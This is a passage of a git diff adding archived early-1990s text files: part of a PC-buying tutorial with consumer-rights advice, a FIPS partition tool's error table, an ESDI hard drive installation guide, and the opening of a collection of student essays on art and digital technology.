OS/2. These + software requirements are not terribly exotic - but are simply + ways to improve performance and speed for more experienced + computer users. + + The hard disk is also a consideration in any computer purchase. + CPU speed is determined by the clock speed of the computer while + hard drive speed is determined by two factors: access speed and + drive type. + + Extremely fast hard drives operate at 18 milliseconds access + time or faster. Bargain computer hard drives operates in the + range of 28 to 40 milliseconds. Hard drives must also be mated + to a controller circuit which offers its own blend of + performance and economy. MFM and RLL drive/controller + combinations are earlier and less expensive hard drives while + ESDI, IDE and SCSI drives are faster and more expensive high + performance options. + + Floppy drives come is various configurations. Budget computers + may contain only a 1.2MB floppy drive and hard drive. This + configuration can read two floppy densities: 1.2MB and 360K + floppies. A more flexible computer contains a hard drive, 1.2MB + floppy and 1.44MB floppy. This computer can read four floppy + formats: 1.2MM, 1.44MB, 720K and 360K. Ask if a budget computer + can later be upgraded to include other drive configurations. The + new smaller drives housing the rigid "mini floppies" such as + the 1.44MB and 720K formats hold 20% to 50% more data in a + sturdy plastic case with spring loaded dust door. + + Monochrome displays are suitable for low end word processing but + today's software usually requires VGA color resolution as a + minimum. An affordable option is a VGA video card and a + MONOCHROME (black and white) VGA monitor which provides an + acceptable 64 shades of gray with most modern software + applications. + + Several sources of computer equipment are available - each with + a different flavor. + + 1) Manufacturer direct or direct sales, such as Dell, Northgate + and Zeos. This method usually assures relatively high quality + at fairly attractive price savings since you are dealing + directly with those who design and manufacture the computer. + Service is usually good, via telephone, FAX and BBS. The + downside is that you must deal through the mail and await + delivery. Price is very attractive, but not necessarily the + lowest available. + + 2) Retail vendors such as Computerland or Tandy. Convenience is + the factor here since service, returns and delivery is handled + locally. You pay slightly higher for this additional + convenience. Generally this is the most expensive computer + purchase option. + + 3) Mail Order Houses. Almost 15 percent of PC sales are + conducted by mail. Mail order houses do not completely design + and build their own systems like direct sellers but rely on + imported and pre-manufactured assemblies. Technical phone + support can be variable, but if you shop carefully, you can save + even more over local retail or manufacturer direct channels. + Mail order sources are available in newsstand magazines such as + Computer Shopper and PC Sources. + + 4) VAR's or Resellers. These specialized vendors usually provide + systems in volume frequently with "value added" features such as + special software setup, training or unique customization of + computer systems. + + 5) Home brewers. The ready availability of computer components + has spawned a cottage industry of small shops, some in home or + low rent office spaces which can custom design a system or allow + you to build your own computer using parts and facilities which + they provide. These small, minimum overhead operations can + provide extremely low prices but guarantees and service + contracts should be provided in writing and background of the + vendor should be investigated carefully. + + What are some questions and requirements in purchasing a system? + + What speeds are available on the CPU? 10 Mhz is standard on XT's + with 12 to 20 Mhz on AT's and 33 mhz on 80386 machines. How many + free slots are available on the internal motherboard for + expansion with future upgrade circuits? Five to eight expansion + slots is desirable except on small laptop computers. Is there + both a serial and parallel port? How many of each? Mouse port? + Is a clock chip included? How big is the hard drive? 40 to 80 + Meg is considered somewhat standard in size today for most hard + drives although smaller 20 meg hard drives are useful for light + office use computers. + + How many bays are available for extra drives? Two is minimum. + How many floppies? What size of floppies? Most computers today + minimally have either two floppies OR one floppy and one hard + drive. Who makes the hard drive? Seagate, Connor and Miniscribe + are considered reasonable, although not exclusive choices. Who + makes the floppy drive? Teac, Panasonic, Sony and Toshiba are + considered reputable in floppy manufacture. + + Whose BIOS chip powers the machine? Phoenix, Award and AMI Bios + chips are all fine. How much memory is installed on the + motherboard. 640K is a bare minimum for all machines with 80286 + and 80386 machines usually offered with at least two to four + Megs of RAM memory. Any memory cache chips? Any coprocessor + installed? Coprocessor socket available? + + What warranty covers the product and for how long? Does the + warranty cover both parts and labor? Does the vendor have + sufficient inventory to replace the entire computer if problems + arise? Is there a different warranty for the printer? Who + provides the service? What is the vendor's return policy AND + refund policy. Is there a restocking charge? Is there a discount + or change in price when dealing by check or charge card? How + long has the vendor been in business? Is the warranty 90 days, + one year or two years as some manufacturers are now offering? + Money back guarantee? How long? 30, 60, 90 days? What type of + refund on this guarantee: store credit, cash, exchange? Will you + put it in writing? Shipping and handling fee? Visa card + surcharge? + + How good is technical support? Is there a toll-free support + line? 24 hours or limited hours? Is there a BBS (modem) + telephone line for support? + + Is maintenance performed on site (the customer's location) or + only at the vendor's location? Response time? Special + conditions? Is the on-site service essentially the same in + terms, such as parts and labor, as off-site? + + Has the vendor sold computers to buyers in your business + specialty (medical, for example). References? How long has the + vendor been in business? + + What is the estimated life of the PC? Of the hard drive? How far + can it be upgraded? In RAM memory? How many expansion slots? + Can the CPU be upgraded? The display and graphics card? What is + the MTBF or mean time between failure of the components such as + the hard drive and printer according to printed manufacturer's + literature? + + Does the computer come with ALL the parts you will need such as + monitor and graphics card? On many bare bones systems this is + extra. + + Are the accessories from the same manufacturer? Is the item + available for immediate shipment or is a backorder the option of + the moment? When will it be shipped? Has there been a recent + price increase? + + Any financing options available from the vendor which offer + advantage over bank or credit card purchase? Leasing options? + Bank financing carried by the vendor? What bank? + + Extras included with purchase? Documentation? DOS software? What + version? DOS 5.0 is the latest. Mouse? Software installed on the + hard drive? Is it legal software? Is is commercial software? + Shareware? + + Any training classes provided? When? How often. Brush up + training free? + + What utilities and extra software comes with the machine? Any + hard drive menu systems or utility software? How is the + documentation? Really good or just whatever the manufacturer had + translated? + + What display monitor and card are included (if any)? VGA is + standard. EGA is minimum. CGA and Hercules are the bare minimum. + Are printer cables included with purchase of the printer? Any + spare printer ink cartridges included? + + How is the keyboard. Springy and clicky with a tactile feel or + just mushy and so so? + + Is the Basic programming language included or is this an extra + cost. Will the manufacturer throw in a software package suitable + for beginners such as Microsoft Works? Is the machine FCC class + B certified (the best) or class A (acceptable)? What is the + interleave on the hard drive (1:1 is fastest)? Is the keyboard + an 84 key type or 101 key type? + + Is the computer case metal or plastic? How hard or easy is it to + pop the cover and install new circuit cards? Does the keyboard + plug into the front or back of the machine? The front plug + option is a sometimes more handy. Is the reset and on/off switch + on the front, back or side of the machine? Front is again more + handy. Panel lights on the machine to indicate CPU speed and + hard drive use? Keylock for security? How many copies of the + key? Does your key fit all the computers in the store too? + + Does a local computer club/user group buy from the vendor which + might provide personal references who can discuss why they + bought from that vendor? + + For those who wish to read published reviews concerning specific + brands of computers, printers, monitors, modems and software: + the most complete resource is PC Magazine published by Ziff- + Davis and available at most libraries and many newsstands. PC + Magazine editors usually select one or two items within a + product classification as their "Editors Choice." The complete + index to both PC Magazine as well as their product review index + is contained in their on-line modem service PC MagNet. + Instructions for reaching PC Magnet by modem are contained in + the Utilities section included within each issue of PC Magazine. + + For product reviews of hardware and software you may wish to + download the PC MagNet files PCM.EXE, PCSRCH.EXE and PCM.INF + which are quite large. The files occupy more than 2 Megabytes of + disk space and require about 1.5 hours of somewhat expensive + modem connect time. Alternatively, you can reach the same + index of products on line within PC MagNet by typing GO REVIEWS + which allows you to search the product review database directly. + A larger database of 130 periodicals and their respective + product reviews can be viewed by typing GO COMPLIB from within + PC MagNet. Additional product review sources are suggested on + page 27 of the June 26, 1990 issue of PC Magazine (Vol 9 No 12.) + Page 397 of the same issue contains instructions on reaching and + using PC MagNet by modem. + + If you do not have a modem or a friend with that capability, a + low-tech method for reviewing specific computer hardware and + software recommendations is to visit a local library which + contains back issues of PC Magazine. Glance at the magazine + cover for highlights of products reviewed in that issue. If you + work your way from the current issue backwards in time for 6 to + 12 months, you should find detailed reviews on the equipment you + are investigating. Many computer clubs maintain a library of PC + Magazine issues and may be a source if your local library does + not subscribe to the magazine. + + Yet another way to constructively shop for computer equipment is + to obtain free catalogs which are provided at no charge by + reputable computer vendors and manufacturers. See the listing of + free equipment catalogs contained in the recommended + reading/bibliography section elsewhere on this disk. + + ---------------------------------------------------------------- + + 22 BASIC COMMANDMANTS OF COMPUTER CONSUMERISM + + ---------------------------------------------------------------- + + 1) Does the computer contain sufficient RAM memory and CPU speed + for the applications you intend to run and how easy is it to add + more memory? A 80286 computer may be fine for word processing, + for example, but a poor choice for extensive desktop publishing. + + 2) Is the computer FCC approved with an FCC sticker? Class A or + B? Class B is better since it means certified for home use and + theoretically emits less objectionable static radiation. + + 3) Have you identified the software you will (or might) be + using? Can the machine run that software? Is DOS included with + your machine? + + 4) As your needs change in time, will the machine expand or + change with those needs? + + 5) Is the outer case of the computer large enough to accommodate + additional expansion circuit boards? How many? + + 6) Is the power supply sufficiently large for future expansion? + What is the wattage of the power supply? Is the fan noise low or + NERVE WRACKING? + + 7) How many and what kind of floppy drives do you need? + + 8) Is the hard disk (if the machine contains one) certified for + use with the internal controller board which operates it? What + make on the controller card and hard drive? + + 9) Is the hard disk set with the correct interleave factor? + + 10) Will your dealer offer superior service after the sale? Who + does the service? Where? Any free training classes? + + 11) Are all warranties in writing and how do they compare to + other dealers warranties in writing? + + 12) What kind of monitor will you need and does the video + adapter card inside the computer allow for monitor upgrades and + will it display the software you intend to use? + + 13) Are you buying the computer or a sales pitch? + + 14) Are the internal components industry standard? Especially + the floppy and hard drives. What brands? + + 15) Is the dealer trying to sell you more/less than you need? + + 16) Have you set a realistic budget? + + 17) Have you gathered information for all sources such as + friends, magazine reviews, stores and advertisements? Are you + relying on one computer guru from work or, more wisely, several? + + 18) If the price is far below the average, something is missing. + What is it? Quality of the hard drive, lack of higher resolution + video, toll free telephone support, software such as DOS? + + 19) Determine the REAL price by extracting hidden additional + shipping charges, credit card surcharges, restocking charge if + item returned. + + 20) Pay by credit card if possible since if you end in dispute, + your credit card company can go to bat for you and issue a + credit until the dispute is resolved. In addition, many credit + cards automatically double the manufacturer's warranty. + + 21) Get details in writing. What is the salesperson's name? What + is the exact shipping date? 24 hours? same day? Get it in + writing via FAX. Retain the ORIGINAL AD which promoted the + computer. A paper trail established early is the best + protection. Retain warranty cards long enough to test all + equipment functions first! If you mail in manufacturer's + warranty cards too quickly, you may have to settle for + warranty coverage rather than replacement by the vendor. + + 22) Retain all original cartons and packing material. Many + vendors ABSOLUTELY require it in case of return! + + ---------------------------------------------------------------- + + MUSCLE FOR COMPUTER CONSUMERS - THE LONG ARM OF THE LAW + + ---------------------------------------------------------------- + + If you are dealing with a mail order supplier, Federal Trade + Commission rules apply! Essentially the vendor must ship the + order within 30 days of receiving it unless the advertisement + states otherwise. If a delay will be experienced in shipment, + the vendor must notify you in writing of a definite new shipment + date and also offer you the chance to cancel the order with full + refund. That notice must include a stamped or self-addressed + envelope or card which allows you to indicate your choice. If + you do not respond, the seller may rightfully assume you accept + the delay. However, the vendor must either ship or cancel the + original order within 30 days after the original shipping date + which was promised. + + Any refunds for order cancellation must be made promptly. Even + if you accept an indefinite delay, you have the right to cancel + the original order at any time before the item is shipped. If + you chose to cancel any order, which has been paid by check or + money order, the vendor must mail a refund within seven business + days excluding weekends and holidays. + + Likewise if the order was paid for by credit card, the vendor + must credit your account within one business cycle following + your cancellation request. Store credits and other methods or + offers of similar merchandise are NOT acceptable unless you + agree. If the original item is not available, a substitute item, + even if similar, is not acceptable unless the vendor has your + consent. Report violations to the Federal Trade Commission whose + phone number is usually listed in the blue pages (government + section) of your local telephone book. Tell the vendor you are + reporting violations to the FTC and mail the vendor a copy of + the letter you wrote to the FTC. This usually brings action + quickly. + + One primary conduit for recourse is the Direct Marketing + Association which maintains an action line for problem + resolution. First you should attempt to deal directly with the + seller, but if a problem is not promptly resolved you may wish + to contact the Mail Order Action Line, c/o DMA, 6 East 43rd + Street, NY, NY 10017. + + The first step in any attempt to seek redress from a vendor is + to notify the supplier in writing that the item is defective + and include a copy of the invoice with information as to model, + price, date of order and account number if available. Retain a + copy of your letter seeking refund or replacement. Any phone + calls should be followed by a letter. + + Generally do not return the item to the vendor until told how + and when to do so, since many have formal return policies and + require "return authorization numbers" which are usually issued + to you by phone or in writing. The return authorization number + accompanies the defective item on its return. Keep a copy of the + shipping receipt and packing slip. Any rights to recover postal + or shipping costs is determined by the policy of that vendor as + is usually stated in advertising and product literature. + + You may also consider contacting the attorney general for the + state in which you live as well as the state in which the vendor + does business. This can be MOST effective especially if you send + a copy of that letter to the vendor. If the product was paid for + with a credit card, you may also retain the right to withhold + payment or cancel payment which is usually arranged directly + with your bank or credit card issuing agency. This is explained + under provisions of the Federal Fair Credit Billing Act. + + Tutorial finished. Be sure to order your FOUR BONUS DISKS which + expand this software package with vital tools, updates and + additional tutorial material for laptop users! Send $20.00 to + Seattle Scientific Photography, Department LAP, PO Box 1506, + Mercer Island, WA 98040. Bonus disks shipped promptly! Some + portions of this software package use sections from the larger + PC-Learn tutorial system which you will also receive with your + order. Modifications, custom program versions, site and LAN + licenses of this package for business or corporate use are + possible, contact the author. This software is shareware - an + honor system which means TRY BEFORE YOU BUY. Press escape key to + return to menu. + + diff --git a/textfiles.com/computers/errors.txt b/textfiles.com/computers/errors.txt new file mode 100644 index 00000000..b93702d1 --- /dev/null +++ b/textfiles.com/computers/errors.txt @@ -0,0 +1,189 @@ +Table of Errors: + +Most of these will prevent the Harddisk from working correctly under DOS, so +it's not likely that you ever get these errors. + +Invalid Rootsector Signature + The last two bytes of the rootsector must be 55 AA (hex) +More than one bootable Partition + In the partition table there should only be one partition marked bootable + You can override this message with the -omb switch +Invalid bootable-flag + The bootable flag in the partition table should be 80h or 0 + You can override this message with the -obf switch +Invalid Start Sector + The start sector number of the partition is either 0 or greater than + the number of sectors per track +Invalid End Sector + The end sector number of the partition is either 0 or greater than + the number of sectors per track +Invalid Start Head + The number of the start head of the partition is greater than the total + number of heads of the drive - 1 +Invalid End Head + The number of the end head of the partition is greater than the total + number of heads of the drive - 1 +Partition Table Corrupt - start + The start sector (head/cylinder/sector) does not match the absolute start + sector +Partition Table Corrupt - end + The end sector (head/cylinder/sector) does not match the absolute start + sector + the number of sectors +Overlapping Partitions + The partition table contains overlapping partitions +Invalid Jump Instruction in Bootsector + The first three bytes of the bootsector must be a 3-byte jump (E9 xx xx) + or a 2-byte jump (EB xx 90). Perhaps the partition is not yet formatted. + FIPS can only split DOS-formatted partitions. +Invalid Bootsector + The last two bytes of the bootsector must be 55 AA (hex) +Can't handle number of Bytes per Sector + The number of bytes per sector must be 512 +Number of Sectors per Cluster must be a power of 2 + Only 1, 2, 4, 8, 16, 32, 64 or 128 are allowed +Partition must have 2 FATs + Every DOS partition has 2 copies of the FAT +Number of Rootdir entries must be multiple of 16 + One sector of the rootdirectory contains 16 entries + You can override this message with the -ore switch +Number of Rootdir entries must not be zero + Sounds reasonable, doesn't it? +Wrong Media Descriptor Byte in Bootsector + The Media Descriptor Byte in the Bootsector should be F8 (hex) + You can override this message with the -omd switch +FAT too large + FAT has more than 256 sectors - useless, since 2 bytes * 64K entries = + 128K = 256 * 512 bytes. If you can access the drive, do not attempt to + change this. + You can override this message with the -olf switch +FAT too small + The partition has more clusters than the FAT can handle + You can override this message with the -osf switch +Number of hidden sectors incorrect + The number of hidden sectors in the bootsector must match the number + of the start sector in the partition table +12-bit FAT not supported + FIPS can't split partitions with a 12-bit FAT +Number of sectors (short) must be zero + For partitions with more than 65536 sectors (BIGDOS) the number of sectors + (short) must be zero +Number of sectors (short) does not match Partition Info + The number of sectors in the partition table must match the number of + sectors in the bootsector +Number of Sectors (long) does not match Partition Info + The number of sectors in the partition table must match the number of + sectors in the bootsector + +Invalid Drive number + Only the numbers 128 - 255 are valid drive numbers +Invalid Partition number + Only the numbers 1 - 4 are valid partition numbers + +Error reading FAT 1 + Read error - bad sector +Error reading FAT 2 + Read error - bad sector + +FAT copies differ + The two copies of the FAT differ - use CHKDSK +Wrong Media Descriptor Byte in FAT + The first byte of each FAT is the Media Descriptor - it should be F8h + You can override this message with the -omd switch +New Partition not empty + The New Partition must be completely empty + +Too many drives found + FIPS can handle up to 9 drives - that should be enough for most PCs :-) +No Compatible Harddisk found + Hey, where is your drive? Perhaps your Harddisk is not int 13h compatible. +No valid partition found + All partitions in the partition table are empty +No free partition + All four partitions are in use + +Error reading Drive Geometry + Interrupt 13h 08h returned an error code +Drive Initialization Failure + Interrupt 13h 00h returned an error code +Error reading Root Sector + Read error - bad sector, wrong drive number or incompatible harddrive +Can't split extended Partitions + FIPS can not yet split extended DOS partitions +Invalid Partition selected + The partition selected with the -p switch is empty +Unknown Filesystem + Only DOS partitions can be split (System Indicator Byte must be 4 or 6) +Error reading Boot Sector + Read error - bad sector +Partition too small - can't split + If the partition has only slightly more than 4085 clusters, it can't be + split any further without rewriting the FAT to 12 bit. +Last Cylinder is not free + Since the new partition is created at the end of the old one and + contains at least one cylinder, the partition can not be split if + not at least the very last cylinder is completely free. + Probably there is a hidden file like 'image.idx' or 'mirorsav.fil' + in the last cylinder - see the doc. +Invalid new start cylinder + The start cylinder chosen with the -c switch is not valid +Error writing Root Sector + Write error - perhaps the disk is write protected? +Error writing Boot Sector + Write error :-( - this will hopefully never happen ... + +Too many save files on disk + There can only be ten save files on one floppy disk (rootboot.000 to + rootboot.009). Delete some or use another floppy disk. +Can't open file + FIPS tried to write the file rootboot.00? to drive A: but an error occured + Try using another floppy disk +Error writing file + FIPS tried to write the file rootboot.00? to drive A: but an error occured + Try using another floppy disk +Error closing file + FIPS tried to write the file rootboot.00? to drive A: but an error occured + Try using another floppy disk + + +Warnings: + +These will not cause FIPS to exit, since they are not really errors. If you +have the possibility to correct the problem, do it; if not, this will not +affect DOS, so you should be safe. + +Invalid Partition entry + The partition entry contains data, but the system indicator is 0 (empty). + Attention: FIPS will possibly overwrite this entry. Make sure this is no + valid Partition (temporarily disabled etc.) +Partition does not end on Cylinder boundary + All partitions should end on a cylinder boundary +Partition does not begin on Cylinder boundary + Normally, all partitions except the first one should begin on head 0, + sector 1 of a cylinder. This is not required by DOS, however. +Free Space between Partitions + There is free space on the harddisk that is not covered by a partition +Number of reserved sectors should be 1 + The bootsector uses only 1 sector, so the number of reserved sector + is usually 1. If you can access your drive, do not attempt to change this. +Sectors per track incorrect + The number of sectors per track in the bootsector does not match the actual + drive geometry reported by the BIOS +Number of drive heads incorrect + The number of drive heads in the bootsector does not match the actual + drive geometry reported by the BIOS +Wrong System Indicator Byte + For BIGDOS Partitions the System Indicator Byte should be 6; for DOS16 + Partitions it should be 4 +Wrong Signature + Partitions with 32-bit sector numbers (since DOS 4.0+) have an 'extended + Bios Parameter Block' in the bootsector, its signature byte is 29h. This + is however totally ignored by DOS. +Drive number in bootsector does not match actual drivenumber + The drive number in the bootsector does not match the drive number by which + the drive is accessed +Wrong FAT entries 1 & 2 + A 16-bit FAT should start with F8 FF FF FF +Can't open debugfile + The debugfile is created in the current directory - make sure it is + writable + diff --git a/textfiles.com/computers/esdi.txt b/textfiles.com/computers/esdi.txt new file mode 100644 index 00000000..14925edc --- /dev/null +++ b/textfiles.com/computers/esdi.txt @@ -0,0 +1,190 @@ +BASIC INSTALLATION PRODCEDURE for ESDI Drives +by Ryan Ramsey -- July 3, 1992 + +All Micropolis ESDI need to be low-level formatted on the controller you +intend to use them with. Because of this, and with all ESDI drives, if you +ever switch the controller, you will also need to back-up your data, and +low level format the drive again. ESDI drives need a little more attention +to configuration than SCSI drives do. The major things that must be done +are setting up your system CMOS, drive addresses, sector size, and termination. + +SETTING UP THE CMOS +------------------- + + In order for your computer to use an ESDI drive, it must first be + denoted in your system CMOS. The first thing you must do is go into + your system CMOS and set your drive types accordingly. Most CMOS's + allow you to select a type from 0 (not installed) to 47, where 47 + is a user-defined entry and 1-46 are preset types. + + For all Micropolis ESDI drives, you should set your type to drive + type 1. On intelligent BIOS's, it will tell you you only have a 20MB + drive, but when it comes time to low level format the drive, this + drive type will indicate to the controller card to pull the parameters + off the physical drive and set itself up. + + If your are installing only one drive, then only your DRIVE 0, or + DRIVE C, parameter should be set to drive type 1. If you are setting + up two drives, both DRIVE 0/C and DRIVE 1/D must be set to 1, once + again, regardless of what the capacity comes out to. + + NOTE: These settings are for ESDI drive only! If for example you have + one ESDI drive and one SCSI drive, you will only set DRIVE 0/C to + drive type 1. SCSI drives will set themselves up. + + After this is accomplished, the setup should be saved and exited and + the system will then reboot. + +SETTING DRIVE ADDRESSES +----------------------- + + In order for your machine bus to be able to tell where it is getting its + information from, it is neccessary for each drive to have a particular + drive address. This number, is set with jumpers on the circuit board side + of the drive. The jumper block will be labeled as follows: + + DA1 + |DA2 + | | DA3 + ___________|_|_|_ + | . . . . . . . . | + | . . . . . . . . | + ----------------- + | | | | | + W1 | | | | + W2 | | | + W3 | | + W4 | + W5 + + The first part of this jumper block (The 'W' series) sets your sector + size and bytes per track. In most cases it should be set only to W2, + which sets it for the factory standard, yielding the most capacity at + 512-Bytes per Sector. If you are using a very slow machine such as the + IBM-XT, you will also want the W1 jumper installed (Write Fault Latch). + + If another configuration is needed, you find out the sector sizes and + bytes-per-track numbers from your drives specification sheet. + + The next part is to set your drive address, and this is done with the + DA jumpers (they could be labeled DS in older models). These jumpers + are not only related to your drive (whether it is primary or secondary), + but also to your cable. If you have a twisted cable (there is a physical + twist in the cable between the first and last nodes), the scheme will be + a little bit different. To find out how you should have this section + jumpered, follow this basic configuration. + + ONE DRIVE SYSTEM (Primary Drive) + The primary drive should always be connected to the last (end) node + of your cable. + + TWISTED CABLE: Jumper on DA2 ONLY. + FLAT CABLE: Jumper on DA1 ONLY. + + TWO DRIVE SYSTEM (Primary and Secondary Drive) + Once again, the primary drive should be connected to the last (end) + node of your cable, and the secondary drive in the middle (first) + node of the cable. + + TWISTED CABLE: Primary at DA2, Secondary at DA2 + FLAT CABLE: Primary at DA1, Secondary at DA2 + + NOTE: If your cable has the twist CLOSEST to the colored stripe, you + are using a FLOPPY cable, and this will not work! + +DRIVE TERMINATION +----------------- + + Termination is something that causes a lot of undue grief for everyone, but + the concept is really simple. + + "Only the last drive on the CABLE must be terminated, + all others should be un-terminated." + + and + + "The chain must be terminated on both ends." + + The controller must be terminated (which is the way it comes from 99.99% + of the manufacturers) AND the very last drive/component on the CABLE + (do not get "the last drive on the cable" confused with the "last drive, + which would be the highest DRIVE ADDRESS"). + + Therefore, a graphic display would look as follows: + ____ + / \ + | HOST |=====DEVICE=====DEVICE + \____/ | | + | UN-TERMINATED | + | | + TERMINATED TERMINATED + (Usually default) + + So once again: + + If you have only one drive, it is to be TERMINATED. + If you have more than one drive, all drives must be UN-TERMINATED + except for the last PHYSICAL drive on the CABLE which must + be TERMINATED. + + +CABLE INSTALLATION +------------------ + + Once the two above items are checked and configured, all you need to + do then is put the drive on the cable (matching the red stripe on the + cable to pin one on the controller card) and then power on. + + NOTE: If you have a twisted cable, if the twist is closest to the + COLORED stripe, you will NOT be able to use it because it + is a FLOPPY cable. You must get either a FLAT cable or a + TWISTED cable where the twist is furthest away from the colored + stripe. + + +TROUBLESHOOTING GUIDE +--------------------- + + PROBLEM + Cannot see the drive. + REMEDY + 1. Did you set your Drive 0 to type 1 in your CMOS? + 2. Check your drive address, it may be in the wrong location. + 3. Check your sector size. Most computers use 512-bytes per sector + and if your drive is set up otherwise, it may not be able to + see it. Set the drive to the factory default (W2). + + PROBLEM + When booting up the system, the machine gets hung up at the bios + banner of the controller card. + REMEDY + There are a few possibilities for this problem. + 1. There are two drives with the same drive address. + Verify that all drives have different SCSI ID's. + 3. There could be a bios conflict. + Change the bios address of the controller card to a different + memory location. + 4. There could be a conflict with add in boards. Check and make sure + that there are no memory conflicts with any add in boards or + bios's, check DMA's, IRQ's, and port addresses. + + PROBLEM + When you boot up, the computer gives you a message along the lines + of "Drive C not found" or "Drive 0 not found". + REMEDY + Check your drive addressing jumpers, they are most likely set + incorrectly. Also, check your cables, they may not be seated + properly. + + If you are experienceing a problem that is not approached in this + document or you continue to have problems, you may do one of the + following: + + 1. Call our Technical Support Line at (818) 709-3325. + 2. Call our BBS at (818) 709-3310 and leave an email to the Sysop. + 3. FAX your request to us at (818) 718-5352. + 4. Mail your request to: + Micropolis Corporation + Attn: Technical Support + 21211 Nordhoff Street + Chatsworth, CA 91311 diff --git a/textfiles.com/computers/essays.txt b/textfiles.com/computers/essays.txt new file mode 100644 index 00000000..5a6b0cdf --- /dev/null +++ b/textfiles.com/computers/essays.txt @@ -0,0 +1,5298 @@ + + +ART IN THE AGE OF DIGITAL DISSEMINATION +CLASS ESSAYS from a Fine Arts Course +taught at the University of Victoria, B.C., Canada +by Brad Brace, 1993 + +Contact: lgammon@nero.uvic.ca +or, Brad Brace, 503-230-1197 +----------------------------------------------------------------- +----------- + +This Fine Arts course was the first "art & technology" course +taught at the University of Victoria. The students involved were +from a variety of disciplines (although, primarily visual arts +students) and had for the most part, little or no previous +exposure to computers. The Computer Lab at the University has, an +array of imperious nerds intent on empire-building, 10 networked +Sun workstations, a few slow Macintoshes, two flatbed scanners, +one PC and some basic pagelayout and photo manipulation software +primarily for the Macintoshes, basic sound/midi equipment, and a +grumpy creative-writing professor who regularly shuffles down the +hall to the faculty-lounge to wash out his teapot. This was +enough equipment to provide glimpses of creative possibilities; I +suspect that enough enthusiasm has been generated to warrant the +purchase of additional equipment and software, and to have this +course offered on a regular basis. A printing press would also be +a nice adjunct to the existing traditional visual art +departments. I have also offered to design and build a virtual +text-based reality (MOO) for the Fine Arts Department. + + Although characterized as a "studio course" I felt it more +appropriate to discuss the larger issues involving technology and +contemporary culture and minimize the importance of a through +"knowledge" of specific software. This was accomplished with +handouts and discussions of pertinent articles, screenings of +appropriate films, and contemporary music. Particular attention +was given to networks and interconnectivity in general and of +course, the Internet. Although this was an introductory course, +the exposure to the various resources available through the +Internet encouraged a phenomenally rapid grasp of both digital +dissemination and the (Unix) operating system. + + ----------- + + Course Description: "A flirtatious romp lightly over the +glittering periphery of digital technology. Has art and the avant +garde disappeared from view, gradually leaking into an +all-pervasive generalized aestheticism? Could it be that +something that might have once been called art is alive and +flourishing between connected networkers... unbeknownst to +implausible and incestuous art institutions? Are there really +still artists around who think they're making art? Are computer +systems virtually enacting the penultimate hierarchy, enforcing +oppressive political privilege; or are they the new democratic, +means of representation? Has the critical art press stood still +under a deluge of new cultural publications? Have we *all* become +artist? These questions and more...! + + "An introduction and collaborative overview and analysis of +fairly recent, mid-range, cultural tools and their implied +functions. + + "Students are encouraged to attend all classes and optimize +their uses of the equipment while exploring various venues +throughout the reserved studio time following the class each +morning. Other facilities on and off-campus will also be +utilized. + + "A reminder that an informal essay of three to four thousand +words is required for this course. It should be "brimming with +original insight and speculation on contemporary culture and +technology." It may be informal in that it employs creative +writing techniques (contemporary structures, verse, quotations, +dialogue, illustrations, etc.). It may make reference to +contemporary media, including the materials/sources shown in +class. + + "Also required, is an electronic-portfolio of visual and +audio art projects. This should demonstrate some degree of +familiarity of software and resources covered in the lab. It need +not be an extensive or necessarily cohesive body of work. It +should be strongly suggestive of a developing approach to +technological media." + + +---------------------------------------------------------------- + + + +ESSAYS: + + + +The Dematerialization of Art, Life, and Real Estate. + +"The highest problem of any art is to cause by appearance the +illusion of a higher reality." - Goethe Although Goethe's exact +meaning is open to interpretation the computer appears to be a +tool ready to meet the spirit of his objectives. At least in the +minds of many electronic artists. The computer, particularly +draws the attention of artists today because it epitomizes +current technological development and offers the greatest +potential for exploring new creative places. If we somehow feel +limited by our imagination, the demands of the marketplace, or +current art theory, the computer is one element that somehow +suggests unlimited potential. For those who consider themselves +to be Renaissance men and women the computer is a godsend. + In addition to being a production tool the computer is a window +on and an interface to the rest of the electronically connected +world. The computer as production tool switches modes and +becomes a link to countless other artists and resource people +throughout the world. It only takes a little thought to consider +the possibilities of combining these activities. + +Analyzing the computer as a creative tool is similar to +considering fire as a system to cook one's dinner. It can +certainly do that but it has some other dimensions and +possibilities. Understanding the realm of the computer and its +companion data highways is pertinent to its effective use. What +context does art occupy when it uses electronic space? What new +creative possibilities does it present, what are its +limitations.. audience.. temporal qualities.. style.. +control... access.. money.. appropriation.. credibility..? Is +there a new underlying language used to create and read +art-cyberart. Can traditional art fit into the cyberworld? Can +Venus de Milo be digitized and stored on to a hard drive and +still be a credible work of art? + +The computer as creative tool dematerializes the process of +production. A painter might personally mix gallons of paint, +spend hours making canvases, wait for paint to dry, spill paint +on his clothes or make a small rip in his canvas. None of this +is a factor or even a possibility when the image maker uses Adobe +Illustrator. Is any of this an influencing factor in creating +culturally significant images. Can these qualities be duplicated +and available in another set of pull-down menus? +The materiality of art has always been a significant dimension, +not only of its final form but in influencing the creative +process. Subtleties expressed by Russian sable and bamboo from +the Mediterranean will present a challenge to future programmers. +Can computers replicate the interaction between traditional +tools, natural materials, and chance occurrence? The future of +media such as metal-plate etching and lithography may be +perpetuated because of their distinctiveness or they may simply +become an archaic mode to be mimicked by a graphics program. +However, computers can give us some interesting interpretations +of materials. Swiftly moving granite-bodied humanoids, +leopard-skinned fish, and chromed-metal mountains may constitute +kitsch imagery but they prove that the computer does genuinely +extend the dynamic range of expression. + +The lack of materiality in creating art is perhaps secondary to +the non-existence of the completed art work. Although the +finished piece may reside in digital form as a description in +computer code it can only take physical form by another process +of creation, usually mechanical. This re-creation requires an +interpretation of the original and removes the artist from the +final completed piece. Psychologically it places him/her in the +category of being a symbolic language worker and analogous to +being a data entry clerk. This method of production mirrors other +mass produced consumer products and merchandise from the music +and entertainment industry. Questions of authenticity, +provenance, place and uniqueness all affect the value and purpose +of computer generated art work. So.. can computers be used to +create high art? + +Conversely, artists can now extend their domain greatly. Most +significantly, they can jump the fences of the traditional +cultural gate keepers. Since most establishment galleries have a +focused audience, limited budgets, and aesthetic agendas the +opportunities for new or alternative works are limited. Informal +electronic galleries can post computer files with minimal cost +and provide many more times the exposure of individual galleries. +Although some electronic galleries will probably develop their +own gate-keeping qualities the diversity and the large number of +computer installations will probably always provide unique +opportunities for new and non-mainstream art to find an audience. + +Artists that create work for the realm of computers and networks +will find interesting discussions regarding copyright, access, +file standards, reproduction rights, appropriation, modification, +and methods of electronic payment. + +New display systems will continue to be developed for outputting +computer files. Since more and more programs are incorporating +3D functions the interest in VVDs (volume visualization displays) +is growing. Since the promises of holography and Star Trek to +bring live, full motion, 3D images into our living room has not +materialized, computer controlled optical-mechanical systems are +being developed. "Holographic displays show some long-term +potential but they can not 